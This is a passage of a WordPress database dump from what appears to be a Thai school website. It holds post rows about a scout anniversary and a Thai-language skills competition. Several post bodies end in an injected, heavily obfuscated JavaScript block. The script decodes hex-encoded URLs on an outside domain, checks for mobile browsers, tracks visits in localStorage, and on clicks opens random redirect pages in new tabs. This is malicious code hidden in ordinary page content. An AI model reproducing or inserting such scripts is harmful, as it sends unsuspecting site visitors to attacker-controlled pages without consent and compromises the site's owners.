_0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','วารสารประชาสัมพันธ์ “กิจกรรมวันสถาปนาลูกเสือแห่งชาติ”','','inherit','closed','closed','','450-revision-v1','','','2024-08-01 20:58:31','2024-08-01 13:58:31','',450,'http://pakhaeng.ssk.in.th/?p=452',0,'revision','',0),
(453,1,'2024-08-01 21:01:11','2024-08-01 14:01:11','<!-- wp:paragraph -->\n<p><strong>กิจกรรม การแข่งขันทักษาะภาษาไทย</strong> <strong>ตามโครงการรักษ์ภาษาไทย เนื่องในวัปดาห์วันภาษาไทยแห่งชาติ</strong> <strong>ประจำปี 2567</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>วันที่ 15 กรกฎาคม พ.ศ.2567 กลุ่มเครือข่ายคุณภาพการศึกษา CEO ประจิมโนนคูณ ได้จัดกิจกรรมแข่งขันทักษาะภาษาไทย ตามโครงการรักษ์ภาษาไทย เนื่องในสัปดาห์วันภาษาไทยเเห่งชาติ ประจำปี 2567 ณ โรงเรียนบ้านหนองปลาเข็ง กอไหล่ โดย นางเสน่หา พลโสภา ประธานกลุ่ม CEO ประจิมโนนคูณ เป็นประธานในพิธีเปิดกิจกรรมในครั้งนี้ ในการแข่งขันประกอบไปด้วย กิจกรรมคัดลายมือ เรียงความ และการแต่งคำประพันธ์ มีตัวแทนนักเรียนจากโรงเรียนใน กลุ่ม CEO ประจิมโนน เข้าร่วมกิจกรรม</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {\"id\":454,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/สีน้ำเงิน-ประชาสัมพันธ์-ทางการ-ทันสมัย-ประกาศ-จดหมายข่าว-724x1024.png\" alt=\"\" class=\"wp-image-454\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','วารสารประชาสัมพันธ์','','publish','closed','closed','','%e0%b8%a7%e0%b8%b2%e0%b8%a3%e0%b8%aa%e0%b8%b2%e0%b8%a3%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c-31','','','2024-08-01 21:01:14','2024-08-01 14:01:14','',0,'http://pakhaeng.ssk.in.th/?p=453',0,'post','',0),
(454,1,'2024-08-01 21:00:53','2024-08-01 14:00:53','','สีน้ำเงิน ประชาสัมพันธ์ ทางการ ทันสมัย ประกาศ จดหมายข่าว','','inherit','','closed','','%e0%b8%aa%e0%b8%b5%e0%b8%99%e0%b9%89%e0%b8%b3%e0%b9%80%e0%b8%87%e0%b8%b4%e0%b8%99-%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c','','','2024-08-01 21:00:53','2024-08-01 14:00:53','',453,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/สีน้ำเงิน-ประชาสัมพันธ์-ทางการ-ทันสมัย-ประกาศ-จดหมายข่าว.png',0,'attachment','image/png',0),
(455,1,'2024-08-01 21:01:11','2024-08-01 14:01:11','<!-- wp:paragraph -->\n<p><strong>กิจกรรม การแข่งขันทักษาะภาษาไทย</strong> <strong>ตามโครงการรักษ์ภาษาไทย เนื่องในวัปดาห์วันภาษาไทยแห่งชาติ</strong> <strong>ประจำปี 2567</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>วันที่ 15 กรกฎาคม พ.ศ.2567 กลุ่มเครือข่ายคุณภาพการศึกษา CEO ประจิมโนนคูณ ได้จัดกิจกรรมแข่งขันทักษาะภาษาไทย ตามโครงการรักษ์ภาษาไทย เนื่องในสัปดาห์วันภาษาไทยเเห่งชาติ ประจำปี 2567 ณ โรงเรียนบ้านหนองปลาเข็ง กอไหล่ โดย นางเสน่หา พลโสภา ประธานกลุ่ม CEO ประจิมโนนคูณ เป็นประธานในพิธีเปิดกิจกรรมในครั้งนี้ ในการแข่งขันประกอบไปด้วย กิจกรรมคัดลายมือ เรียงความ และการแต่งคำประพันธ์ มีตัวแทนนักเรียนจากโรงเรียนใน กลุ่ม CEO ประจิมโนน เข้าร่วมกิจกรรม</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {\"id\":454,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/สีน้ำเงิน-ประชาสัมพันธ์-ทางการ-ทันสมัย-ประกาศ-จดหมายข่าว-724x1024.png\" alt=\"\" class=\"wp-image-454\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d